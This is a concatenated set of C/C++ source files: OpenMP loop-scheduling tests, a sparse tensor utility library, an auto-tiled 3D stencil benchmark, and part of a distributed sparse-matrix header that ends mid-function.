int a[128] = {0};
for(int i=0; i<128; i++)
{
a[i] = i;
}
int sum = 0;
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime) reduction(+: sum)
for(int i=0; i<128; i++)
{
sum = sum + a[i];
}
}
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum_gold += a[i];
}
ck_assert_int_eq(sum, sum_gold);
unsetenv("OMP_SCHEDULE");
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_dynamic)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_dynamic_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "dynamic,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_guided)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
START_TEST(omp_for_runtime_guided_chunk)
{/*{{{*/
int a[128] = {0};
setenv("OMP_SCHEDULE", "guided,10", 1);
#pragma omp parallel shared(a)
{
#pragma omp for schedule(runtime)
for(int i=0; i<128; i++)
{
a[i] = i;
}
}
unsetenv("OMP_SCHEDULE");
int sum = 0;
int sum_gold = 0;
for(int i=0; i<128; i++)
{
sum += a[i];
sum_gold += i;
}
ck_assert_int_eq(sum, sum_gold);
}/*}}}*/
END_TEST
Suite* test_suite(void)
{/*{{{*/
Suite* s = suite_create("Test");
TCase* tc = tcase_create("omp_for");
tcase_add_test(tc, omp_parallel_for);
tcase_add_test(tc, omp_parallel_for_num_threads_small);
tcase_add_test(tc, omp_parallel_for_parallel_for_num_threads_small);
tcase_add_test(tc, omp_parallel_for_static);
tcase_add_test(tc, omp_parallel_for_static_num_threads_small);
tcase_add_test(tc, omp_parallel_for_static_reduction);
tcase_add_test(tc, omp_parallel_for_static_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_dynamic);
tcase_add_test(tc, omp_parallel_for_dynamic_num_threads_small);
tcase_add_test(tc, omp_parallel_for_dynamic_reduction);
tcase_add_test(tc, omp_parallel_for_dynamic_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_guided);
tcase_add_test(tc, omp_parallel_for_guided_num_threads_small);
tcase_add_test(tc, omp_parallel_for_guided_reduction);
tcase_add_test(tc, omp_parallel_for_guided_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_runtime);
tcase_add_test(tc, omp_parallel_for_runtime_num_threads_small);
tcase_add_test(tc, omp_parallel_for_runtime_static);
tcase_add_test(tc, omp_parallel_for_runtime_static_chunk);
tcase_add_test(tc, omp_parallel_for_runtime_static_reduction);
tcase_add_test(tc, omp_parallel_for_runtime_static_reduction_num_threads_one);
tcase_add_test(tc, omp_parallel_for_runtime_dynamic);
tcase_add_test(tc, omp_parallel_for_runtime_dynamic_chunk);
tcase_add_test(tc, omp_parallel_for_runtime_guided);
tcase_add_test(tc, omp_parallel_for_runtime_guided_chunk);
tcase_add_test(tc, omp_for_static);
tcase_add_test(tc, omp_for_static_num_threads_small);
tcase_add_test(tc, omp_for_static_reduction);
tcase_add_test(tc, omp_for_dynamic);
tcase_add_test(tc, omp_for_dynamic_num_threads_small);
tcase_add_test(tc, omp_for_dynamic_reduction);
tcase_add_test(tc, omp_for_guided);
tcase_add_test(tc, omp_for_guided_num_threads_small);
tcase_add_test(tc, omp_for_guided_reduction);
tcase_add_test(tc, omp_for_runtime);
tcase_add_test(tc, omp_for_runtime_static);
tcase_add_test(tc, omp_for_runtime_static_chunk);
tcase_add_test(tc, omp_for_runtime_static_reduction);
tcase_add_test(tc, omp_for_runtime_dynamic);
tcase_add_test(tc, omp_for_runtime_dynamic_chunk);
tcase_add_test(tc, omp_for_runtime_guided);
tcase_add_test(tc, omp_for_runtime_guided_chunk);
suite_add_tcase(s, tc);
return s;
}/*}}}*/
int main(void)
{/*{{{*/
int number_failed;
Suite* s;
SRunner* sr;
s = test_suite();
sr = srunner_create(s);
srunner_run_all(sr, CK_VERBOSE);
number_failed = srunner_ntests_failed(sr);
srunner_free(sr);
return (number_failed == 0) ? EXIT_SUCCESS : EXIT_FAILURE;
}/*}}}*/
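/* A possible build line, assuming libcheck and an OpenMP-capable gcc
 * (flags are illustrative, not from the original source):
 *   gcc -fopenmp test.c -lcheck -o test && ./test
 * Some platforms also need -lm, -lpthread, -lrt, or -lsubunit for check. */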
|
sptensor.c |
/******************************************************************************
* INCLUDES
*****************************************************************************/
#include "sptensor.h"
#include "matrix.h"
#include "sort.h"
#include "io.h"
#include "timer.h"
#include <math.h>
/******************************************************************************
 * PRIVATE FUNCTIONS
*****************************************************************************/
static inline int p_same_coord(
sptensor_t const * const tt,
idx_t const i,
idx_t const j)
{
idx_t const nmodes = tt->nmodes;
if(nmodes == 3) {
return (tt->ind[0][i] == tt->ind[0][j]) &&
(tt->ind[1][i] == tt->ind[1][j]) &&
(tt->ind[2][i] == tt->ind[2][j]);
} else {
for(idx_t m=0; m < nmodes; ++m) {
if(tt->ind[m][i] != tt->ind[m][j]) {
return 0;
}
}
return 1;
}
}
/******************************************************************************
 * PUBLIC FUNCTIONS
*****************************************************************************/
val_t tt_normsq(sptensor_t const * const tt)
{
val_t norm = 0.0;
storage_val_t const * const restrict tv = tt->vals;
for(idx_t n=0; n < tt->nnz; ++n) {
norm += tv[n] * tv[n];
}
return norm;
}
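/* tt_density() below returns nnz / (dims[0] * ... * dims[nmodes-1]); the
 * per-mode factorization via the nmodes-th root of nnz avoids overflowing
 * the product of the dimensions. */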
double tt_density(
sptensor_t const * const tt)
{
double root = pow((double)tt->nnz, 1./(double)tt->nmodes);
double density = 1.0;
for(idx_t m=0; m < tt->nmodes; ++m) {
density *= root / (double)tt->dims[m];
}
return density;
}
void tt_print_hist(sptensor_t const * const tt, int mode)
{
int *hist = (int *)splatt_malloc(tt->dims[mode]*sizeof(*hist));
#pragma omp parallel for
for(idx_t n=0; n < tt->dims[mode]; ++n) {
hist[n] = 0;
}
#pragma omp parallel for
for(idx_t n=0; n < tt->nnz; ++n) {
#pragma omp atomic
hist[tt->ind[mode][n]]++;
}
for(idx_t n=0; n < tt->dims[mode]; ++n) {
if(hist[n] > 0) {
printf("%ld %d\n", n, hist[n]);
}
}
splatt_free(hist);
}
idx_t * tt_get_slices(
sptensor_t const * const tt,
idx_t const m,
idx_t * nunique)
{
/* get maximum number of unique slices */
idx_t minidx = tt->dims[m];
idx_t maxidx = 0;
idx_t const nnz = tt->nnz;
fidx_t const * const inds = tt->ind[m];
/* find maximum number of uniques */
#pragma omp parallel for reduction(min:minidx), reduction(max:maxidx)
for(idx_t n=0; n < nnz; ++n) {
minidx = SS_MIN(minidx, inds[n]);
maxidx = SS_MAX(maxidx, inds[n]);
}
/* +1 because maxidx is inclusive, not exclusive */
idx_t const maxrange = 1 + maxidx - minidx;
/* mark slices which are present and count uniques */
idx_t * slice_mkrs = calloc(maxrange, sizeof(*slice_mkrs));
idx_t found = 0;
#pragma omp parallel for reduction(+:found)
for(idx_t n=0; n < nnz; ++n) {
assert(inds[n] >= minidx);
idx_t const idx = inds[n] - minidx;
if(__sync_bool_compare_and_swap(slice_mkrs + idx, 0, 1)) {
++found;
}
}
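  /* The compare-and-swap above lets the parallel loop count each distinct
     slice exactly once: only the thread that flips the marker from 0 to 1
     increments 'found'. */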
*nunique = found;
/* now copy unique slices */
idx_t * slices = (idx_t *) splatt_malloc(found * sizeof(*slices));
idx_t ptr = 0;
for(idx_t i=0; i < maxrange; ++i) {
if(slice_mkrs[i] == 1) {
slices[ptr++] = i + minidx;
}
}
free(slice_mkrs);
return slices;
}
idx_t tt_remove_dups(
sptensor_t * const tt)
{
tt_sort(tt, 0, NULL);
idx_t const nmodes = tt->nmodes;
idx_t newnnz = 0;
for(idx_t nnz = 1; nnz < tt->nnz; ++nnz) {
    /* if the two nonzeros have the same coordinates, accumulate their values */
if(p_same_coord(tt, newnnz, nnz)) {
tt->vals[newnnz] += tt->vals[nnz];
} else {
      /* found another distinct nonzero */
++newnnz;
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m][newnnz] = tt->ind[m][nnz];
}
tt->vals[newnnz] = tt->vals[nnz];
}
}
++newnnz;
idx_t const diff = tt->nnz - newnnz;
tt->nnz = newnnz;
return diff;
}
idx_t tt_remove_empty(
sptensor_t * const tt)
{
idx_t dim_sizes[MAX_NMODES];
idx_t nremoved = 0;
/* Allocate indmap */
idx_t const nmodes = tt->nmodes;
idx_t const nnz = tt->nnz;
idx_t maxdim = 0;
for(idx_t m=0; m < tt->nmodes; ++m) {
maxdim = tt->dims[m] > maxdim ? tt->dims[m] : maxdim;
}
/* slice counts */
idx_t * scounts = (idx_t *) splatt_malloc(maxdim * sizeof(*scounts));
for(idx_t m=0; m < nmodes; ++m) {
dim_sizes[m] = 0;
memset(scounts, 0, maxdim * sizeof(*scounts));
/* Fill in indmap */
for(idx_t n=0; n < tt->nnz; ++n) {
/* keep track of #unique slices */
if(scounts[tt->ind[m][n]] == 0) {
scounts[tt->ind[m][n]] = 1;
++dim_sizes[m];
}
}
/* move on if no remapping is necessary */
if(dim_sizes[m] == tt->dims[m]) {
tt->indmap[m] = NULL;
continue;
}
nremoved += tt->dims[m] - dim_sizes[m];
/* Now scan to remove empty slices */
idx_t ptr = 0;
for(idx_t i=0; i < tt->dims[m]; ++i) {
if(scounts[i] == 1) {
scounts[i] = ptr++;
}
}
tt->indmap[m] = splatt_malloc(dim_sizes[m] * sizeof(**tt->indmap));
/* relabel all indices in mode m */
tt->dims[m] = dim_sizes[m];
#pragma omp parallel for
for(idx_t n=0; n < tt->nnz; ++n) {
idx_t const global = tt->ind[m][n];
idx_t const local = scounts[global];
assert(local < dim_sizes[m]);
tt->indmap[m][local] = global; /* store local -> global mapping */
tt->ind[m][n] = local;
}
}
splatt_free(scounts);
return nremoved;
}
/******************************************************************************
 * PUBLIC FUNCTIONS
*****************************************************************************/
sptensor_t * tt_read(
char const * const ifname)
{
int l = strlen(ifname);
sptensor_t * tt;
if (l > 4 && !strcmp(ifname + l - 4, ".bin")) {
tt = tt_read_binary_file(ifname);
}
else {
tt = tt_read_file(ifname);
}
return tt;
}
sptensor_t * tt_alloc(
idx_t const nnz,
idx_t const nmodes)
{
sptensor_t * tt = splatt_malloc(sizeof(*tt));
tt->tiled = SPLATT_NOTILE;
tt->nnz = nnz;
#if SPLATT_SPTENSOR_HBW
tt->vals = splatt_hbw_malloc(nnz * sizeof(*tt->vals));
#else
tt->vals = splatt_malloc(nnz * sizeof(*tt->vals));
#endif
tt->nmodes = nmodes;
tt->type = (nmodes == 3) ? SPLATT_3MODE : SPLATT_NMODE;
tt->dims = splatt_malloc(nmodes * sizeof(*tt->dims));
tt->ind = splatt_malloc(nmodes * sizeof(*tt->ind));
#if SPLATT_SPTENSOR_HBW
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m] = splatt_hbw_malloc(nnz * sizeof(**tt->ind));
tt->indmap[m] = NULL;
}
#else
for(idx_t m=0; m < nmodes; ++m) {
tt->ind[m] = splatt_malloc(nnz * sizeof(**tt->ind));
tt->indmap[m] = NULL;
}
#endif
return tt;
}
void tt_fill(
sptensor_t * const tt,
idx_t const nnz,
idx_t const nmodes,
fidx_t ** const inds,
storage_val_t * const vals)
{
tt->tiled = SPLATT_NOTILE;
tt->nnz = nnz;
tt->vals = vals;
tt->ind = inds;
tt->nmodes = nmodes;
tt->type = (nmodes == 3) ? SPLATT_3MODE : SPLATT_NMODE;
tt->dims = (idx_t*) splatt_malloc(nmodes * sizeof(*tt->dims));
for(idx_t m=0; m < nmodes; ++m) {
tt->indmap[m] = NULL;
tt->dims[m] = inds[m][0];
for(idx_t i=1; i < nnz; ++i) {
tt->dims[m] = SS_MAX(tt->dims[m], inds[m][i]);
}
}
}
void tt_free(
sptensor_t * tt)
{
#if SPLATT_SPTENSOR_HBW
splatt_hbw_free(tt->vals);
#else
splatt_free(tt->vals);
#endif
for(idx_t m=0; m < tt->nmodes; ++m) {
#if SPLATT_SPTENSOR_HBW
splatt_hbw_free(tt->ind[m]);
#else
splatt_free(tt->ind[m]);
#endif
splatt_free(tt->indmap[m]);
}
splatt_free(tt->dims);
splatt_free(tt->ind);
splatt_free(tt);
}
spmatrix_t * tt_unfold(
sptensor_t * const tt,
idx_t const mode)
{
idx_t nrows = tt->dims[mode];
idx_t ncols = 1;
for(idx_t m=1; m < tt->nmodes; ++m) {
ncols *= tt->dims[(mode + m) % tt->nmodes];
}
/* sort tt */
tt_sort(tt, mode, NULL);
/* allocate and fill matrix */
spmatrix_t * mat = spmat_alloc(nrows, ncols, tt->nnz);
idx_t * const rowptr = mat->rowptr;
idx_t * const colind = mat->colind;
val_t * const mvals = mat->vals;
/* make sure to skip ahead to the first non-empty slice */
idx_t row = 0;
for(idx_t n=0; n < tt->nnz; ++n) {
/* increment row and account for possibly empty ones */
while(row <= tt->ind[mode][n]) {
rowptr[row++] = n;
}
mvals[n] = tt->vals[n];
idx_t col = 0;
idx_t mult = 1;
for(idx_t m = 0; m < tt->nmodes; ++m) {
idx_t const off = tt->nmodes - 1 - m;
if(off == mode) {
continue;
}
col += tt->ind[off][n] * mult;
mult *= tt->dims[off];
}
colind[n] = col;
}
/* account for any empty rows at end, too */
for(idx_t r=row; r <= nrows; ++r) {
rowptr[r] = tt->nnz;
}
return mat;
}
|
3d7pt_var.lbpar.c | #include <omp.h>
#include <math.h>
#define ceild(n,d) ceil(((double)(n))/((double)(d)))
#define floord(n,d) floor(((double)(n))/((double)(d)))
#define max(x,y) ((x) > (y)? (x) : (y))
#define min(x,y) ((x) < (y)? (x) : (y))
/*
* Order-1, 3D 7 point stencil with variable coefficients
* Adapted from PLUTO and Pochoir test bench
*
* Tareq Malas
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#ifdef LIKWID_PERFMON
#include <likwid.h>
#endif
#include "print_utils.h"
#define TESTS 2
#define MAX(a,b) ((a) > (b) ? a : b)
#define MIN(a,b) ((a) < (b) ? a : b)
/* Subtract the `struct timeval' values X and Y,
* storing the result in RESULT.
*
* Return 1 if the difference is negative, otherwise 0.
*/
int timeval_subtract(struct timeval *result, struct timeval *x, struct timeval *y)
{
/* Perform the carry for the later subtraction by updating y. */
if (x->tv_usec < y->tv_usec)
{
int nsec = (y->tv_usec - x->tv_usec) / 1000000 + 1;
y->tv_usec -= 1000000 * nsec;
y->tv_sec += nsec;
}
if (x->tv_usec - y->tv_usec > 1000000)
{
int nsec = (x->tv_usec - y->tv_usec) / 1000000;
y->tv_usec += 1000000 * nsec;
y->tv_sec -= nsec;
}
/* Compute the time remaining to wait.
* tv_usec is certainly positive.
*/
result->tv_sec = x->tv_sec - y->tv_sec;
result->tv_usec = x->tv_usec - y->tv_usec;
/* Return 1 if result is negative. */
return x->tv_sec < y->tv_sec;
}
int main(int argc, char *argv[])
{
int t, i, j, k, m, test;
  int Nx = 0, Ny = 0, Nz = 0, Nt = 0; /* default to 0 so missing argv sizes skip the run instead of reading uninitialized values */
if (argc > 3) {
Nx = atoi(argv[1])+2;
Ny = atoi(argv[2])+2;
Nz = atoi(argv[3])+2;
}
if (argc > 4)
Nt = atoi(argv[4]);
// allocate the arrays
double ****A = (double ****) malloc(sizeof(double***)*2);
for(m=0; m<2;m++){
A[m] = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
A[m][i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
A[m][i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
}
double ****coef = (double ****) malloc(sizeof(double***)*7);
for(m=0; m<7;m++){
coef[m] = (double ***) malloc(sizeof(double**)*Nz);
for(i=0; i<Nz; i++){
coef[m][i] = (double**) malloc(sizeof(double*)*Ny);
for(j=0;j<Ny;j++){
coef[m][i][j] = (double*) malloc(sizeof(double)*Nx);
}
}
}
// tile size information, including extra element to decide the list length
int *tile_size = (int*) malloc(sizeof(int));
tile_size[0] = -1;
// The list is modified here before source-to-source transformations
tile_size = (int*) realloc((void *)tile_size, sizeof(int)*5);
tile_size[0] = 24;
tile_size[1] = 24;
tile_size[2] = 8;
tile_size[3] = 32;
tile_size[4] = -1;
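  // The four extents above are the PLUTO/CLooG tile sizes consumed by the
  // tiled loop nest below (assumed here to correspond to the time and the
  // z/y/x space dimensions); the trailing -1 terminates the list.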
// for timekeeping
int ts_return = -1;
struct timeval start, end, result;
double tdiff = 0.0, min_tdiff=1.e100;
const int BASE = 1024;
// initialize variables
//
srand(42);
for (i = 1; i < Nz; i++) {
for (j = 1; j < Ny; j++) {
for (k = 1; k < Nx; k++) {
A[0][i][j][k] = 1.0 * (rand() % BASE);
}
}
}
for (m=0; m<7; m++) {
for (i=1; i<Nz; i++) {
for (j=1; j<Ny; j++) {
for (k=1; k<Nx; k++) {
coef[m][i][j][k] = 1.0 * (rand() % BASE);
}
}
}
}
#ifdef LIKWID_PERFMON
LIKWID_MARKER_INIT;
#pragma omp parallel
{
LIKWID_MARKER_THREADINIT;
#pragma omp barrier
LIKWID_MARKER_START("calc");
}
#endif
int num_threads = 1;
#if defined(_OPENMP)
num_threads = omp_get_max_threads();
#endif
for(test=0; test<TESTS; test++){
gettimeofday(&start, 0);
// serial execution - Addition: 6 && Multiplication: 2
int t1, t2, t3, t4, t5, t6, t7, t8;
int lb, ub, lbp, ubp, lb2, ub2;
register int lbv, ubv;
/* Start of CLooG code */
if ((Nt >= 2) && (Nx >= 3) && (Ny >= 3) && (Nz >= 3)) {
for (t1=-1;t1<=floord(Nt-2,12);t1++) {
lbp=max(ceild(t1,2),ceild(24*t1-Nt+3,24));
ubp=min(floord(Nt+Nz-4,24),floord(12*t1+Nz+9,24));
#pragma omp parallel for private(lbv,ubv,t3,t4,t5,t6,t7,t8)
for (t2=lbp;t2<=ubp;t2++) {
for (t3=max(max(0,ceild(3*t1-1,2)),ceild(24*t2-Nz-4,8));t3<=min(min(min(floord(Nt+Ny-4,8),floord(12*t1+Ny+21,8)),floord(24*t2+Ny+20,8)),floord(24*t1-24*t2+Nz+Ny+19,8));t3++) {
for (t4=max(max(max(0,ceild(3*t1-7,8)),ceild(24*t2-Nz-28,32)),ceild(8*t3-Ny-28,32));t4<=min(min(min(min(floord(Nt+Nx-4,32),floord(12*t1+Nx+21,32)),floord(24*t2+Nx+20,32)),floord(8*t3+Nx+4,32)),floord(24*t1-24*t2+Nz+Nx+19,32));t4++) {
for (t5=max(max(max(max(max(0,12*t1),24*t1-24*t2+1),24*t2-Nz+2),8*t3-Ny+2),32*t4-Nx+2);t5<=min(min(min(min(min(Nt-2,12*t1+23),24*t2+22),8*t3+6),32*t4+30),24*t1-24*t2+Nz+21);t5++) {
for (t6=max(max(24*t2,t5+1),-24*t1+24*t2+2*t5-23);t6<=min(min(24*t2+23,-24*t1+24*t2+2*t5),t5+Nz-2);t6++) {
for (t7=max(8*t3,t5+1);t7<=min(8*t3+7,t5+Ny-2);t7++) {
lbv=max(32*t4,t5+1);
ubv=min(32*t4+31,t5+Nx-2);
#pragma ivdep
#pragma vector always
for (t8=lbv;t8<=ubv;t8++) {
                    A[(t5+1) % 2][-t5+t6][-t5+t7][-t5+t8] =
                        (coef[0][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6  ][-t5+t7  ][-t5+t8  ]) +
                        (coef[1][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6-1][-t5+t7  ][-t5+t8  ]) +
                        (coef[2][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6  ][-t5+t7-1][-t5+t8  ]) +
                        (coef[3][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6  ][-t5+t7  ][-t5+t8-1]) +
                        (coef[4][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6+1][-t5+t7  ][-t5+t8  ]) +
                        (coef[5][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6  ][-t5+t7+1][-t5+t8  ]) +
                        (coef[6][-t5+t6][-t5+t7][-t5+t8] * A[t5 % 2][-t5+t6  ][-t5+t7  ][-t5+t8+1]);
}
}
}
}
}
}
}
}
}
/* End of CLooG code */
gettimeofday(&end, 0);
ts_return = timeval_subtract(&result, &end, &start);
tdiff = (double) (result.tv_sec + result.tv_usec * 1.0e-6);
min_tdiff = min(min_tdiff, tdiff);
printf("Rank 0 TEST# %d time: %f\n", test, tdiff);
}
PRINT_RESULTS(1, "variable no-symmetry")
#ifdef LIKWID_PERFMON
#pragma omp parallel
{
LIKWID_MARKER_STOP("calc");
}
LIKWID_MARKER_CLOSE;
#endif
// Free allocated arrays
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(A[0][i][j]);
free(A[1][i][j]);
}
free(A[0][i]);
free(A[1][i]);
}
free(A[0]);
free(A[1]);
for(m=0; m<7;m++){
for(i=0; i<Nz; i++){
for(j=0;j<Ny;j++){
free(coef[m][i][j]);
}
free(coef[m][i]);
}
free(coef[m]);
}
return 0;
}
|
SpMat.h | /******************************************************************************
* ** Copyright (c) 2016, Intel Corporation **
* ** All rights reserved. **
* ** **
* ** Redistribution and use in source and binary forms, with or without **
* ** modification, are permitted provided that the following conditions **
* ** are met: **
* ** 1. Redistributions of source code must retain the above copyright **
* ** notice, this list of conditions and the following disclaimer. **
* ** 2. Redistributions in binary form must reproduce the above copyright **
* ** notice, this list of conditions and the following disclaimer in the **
* ** documentation and/or other materials provided with the distribution. **
* ** 3. Neither the name of the copyright holder nor the names of its **
* ** contributors may be used to endorse or promote products derived **
* ** from this software without specific prior written permission. **
* ** **
* ** THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS **
* ** "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT **
* ** LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR **
* ** A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT **
* ** HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, **
* ** SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED **
* ** TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR **
* ** PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF **
* ** LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING **
* ** NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS **
 * ** SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.           **
 ******************************************************************************/
/* Narayanan Sundaram (Intel Corp.), Michael Anderson (Intel Corp.)
 ******************************************************************************/
#ifndef SRC_SPMAT_H_
#define SRC_SPMAT_H_
#include <string>
#include <algorithm>
#include "GMDP/utils/binary_search.h"
template <typename T>
bool compare_tile_id(const tedge_t<T>& a, const tedge_t<T>& b) {
if (a.tile_id < b.tile_id)
return true;
return false;
}
template <typename SpTile>
class SpMat {
public:
int ntiles_x;
int ntiles_y;
int m;
int n;
std::vector<std::vector<SpTile*> > tiles;
std::vector<int> start_idx;
std::vector<int> start_idy;
std::vector<int> nodeIds;
friend boost::serialization::access;
template<class Archive>
void serialize(Archive& ar, const unsigned int version) {
ar & ntiles_x;
ar & ntiles_y;
ar & m;
ar & n;
ar & tiles;
ar & start_idx;
ar & start_idy;
ar & nodeIds;
}
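  // Boost.Serialization uses the same operator& for both saving and loading,
  // so the single serialize() above covers reads and writes of the tile grid
  // metadata.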
inline int getPartition(const int src, const int dst, int* ival, int* jval) const {
(*ival) = -1;
(*jval) = -1;
for (int i = 0; i < ntiles_y; i++) {
if ((src > start_idy[i]) && (src <= start_idy[i + 1])) {
(*ival) = i;
break;
}
}
for (int j = 0; j < ntiles_x; j++) {
if ((dst > start_idx[j]) && (dst <= start_idx[j + 1])) {
(*jval) = j;
break;
}
}
if ((*ival) == -1 || (*jval) == -1) {
printf("%d %d == -1\n", src, dst);
printf("idx: %d %d\n", start_idx[0], start_idx[1]);
printf("idy: %d %d\n", start_idy[0], start_idy[1]);
printf("ntiles_y:%d ntiles_x:%d\n", ntiles_y, ntiles_x);
return -1;
}
return (*ival) + (*jval) * ntiles_y;
}
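  // Note: tiles are laid out column-major over the 2D grid, so the id
  // returned above (and the nodeIds lookup in ingestEdgelist) is
  // row-block + column-block * ntiles_y.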
template <typename T>
void ingestEdgelist(edgelist_t<T>& blob) {
int global_nrank = get_global_nrank();
int global_myrank = get_global_myrank();
int nnz_l = blob.nnz;
edge_t<T>* edge_list = blob.edges;
int m = blob.m;
int n = blob.n;
printf("Rank %d: Before shuffle %d edges\n", global_myrank, blob.nnz);
edge_t<T> * received_edges;
unsigned long int new_nnz = 0;
if(global_nrank == 1)
{
new_nnz = nnz_l;
received_edges = new edge_t<T>[new_nnz];
memcpy(received_edges, edge_list, new_nnz * sizeof(edge_t<T>));
}
else
{
tedge_t<T> * tedges = new tedge_t<T>[nnz_l];
#pragma omp parallel for
for(unsigned long i = 0 ; i < nnz_l ; i++)
{
tedges[i].src = edge_list[i].src;
tedges[i].dst = edge_list[i].dst;
tedges[i].val = edge_list[i].val;
int ival, jval;
int tile_id = getPartition(edge_list[i].src, edge_list[i].dst, &ival, &jval);
assert(tile_id != -1);
tedges[i].tile_id = nodeIds[ival + jval * ntiles_y];
}
__gnu_parallel::sort(tedges, tedges + nnz_l, compare_tile_id<T>);
int * assignment = new int[nnz_l];
#pragma omp parallel for
for(unsigned long i = 0 ; i < nnz_l ; i++)
{
edge_list[i].src = tedges[i].src;
edge_list[i].dst = tedges[i].dst;
edge_list[i].val = tedges[i].val;
assignment[i] = tedges[i].tile_id;
}
delete [] tedges;
unsigned long int * positions = new unsigned long[global_nrank+1];
unsigned long int * counts = new unsigned long[global_nrank];
unsigned long int * recv_positions = new unsigned long[global_nrank+1];
unsigned long int * recv_counts = new unsigned long[global_nrank];
unsigned long int current_count = 0;
for(int i = 0 ; i < global_nrank ; i++)
{
int point = binary_search_right_border(assignment, i, 0, nnz_l, nnz_l);
if(point == -1)
{
counts[i] = 0;
positions[i] = current_count;
}
else
{
counts[i] = (point+1) - current_count;
positions[i] = current_count;
current_count = (point+1);
}
}
positions[global_nrank] = nnz_l;
MPI_Barrier(MPI_COMM_WORLD);
delete [] assignment;
MPI_Request* mpi_req = new MPI_Request[2 * global_nrank];
MPI_Status* mpi_status = new MPI_Status[2 * global_nrank];
for (int i = 0; i < global_nrank; i++) {
MPI_Isend(&counts[i], 1, MPI_UNSIGNED_LONG, i, global_myrank, MPI_COMM_WORLD,
&mpi_req[i]);
}
for (int i = 0; i < global_nrank; i++) {
MPI_Irecv(&recv_counts[i], 1, MPI_UNSIGNED_LONG, i, i, MPI_COMM_WORLD,
&mpi_req[i + global_nrank]);
}
MPI_Waitall(2 * global_nrank, mpi_req, mpi_status);
MPI_Barrier(MPI_COMM_WORLD);
recv_positions[0] = 0;
for(int i = 0 ; i < global_nrank ; i++)
{
new_nnz += recv_counts[i];
recv_positions[i+1] = new_nnz;
}
printf("Rank %d: After shuffle %ld edges\n", global_myrank, new_nnz);
MPI_Datatype MPI_EDGE_T;
MPI_Type_contiguous(sizeof(edge_t<T>), MPI_CHAR, &MPI_EDGE_T);
MPI_Type_commit(&MPI_EDGE_T);
for (int i = 0; i < global_nrank; i++) {
MPI_Isend(edge_list + positions[i], counts[i] ,
MPI_EDGE_T, i, global_myrank, MPI_COMM_WORLD, &mpi_req[i]);
}
received_edges = new edge_t<T>[new_nnz];
for (int i = 0; i < global_nrank; i++) {
MPI_Irecv(received_edges + recv_positions[i], recv_counts[i] ,
MPI_EDGE_T, i, i, MPI_COMM_WORLD, &mpi_req[i+global_nrank]);
}
MPI_Waitall(2 * global_nrank, mpi_req, mpi_status);
MPI_Barrier(MPI_COMM_WORLD);
delete [] mpi_status;
delete [] mpi_req;
delete [] positions;
delete [] counts;
delete [] recv_positions;
delete [] recv_counts;
}
printf("Rank %d: After shuffle %ld edges\n", global_myrank, new_nnz);
tedge_t<T> * tedges2 = new tedge_t<T>[new_nnz];
#pragma omp parallel for
for(unsigned long i = 0 ; i < new_nnz ; i++)
{
tedges2[i].src = received_edges[i].src;
tedges2[i].dst = received_edges[i].dst;
tedges2[i].val = received_edges[i].val;
int ival, jval;
// if(global_nrank == 1)
// tedges2[i].tile_id = 0;
// else
tedges2[i].tile_id = getPartition(received_edges[i].src, received_edges[i].dst, &ival, &jval);
if(tedges2[i].tile_id == -1) {
// val has generic type T, so only the integer endpoints are printed here
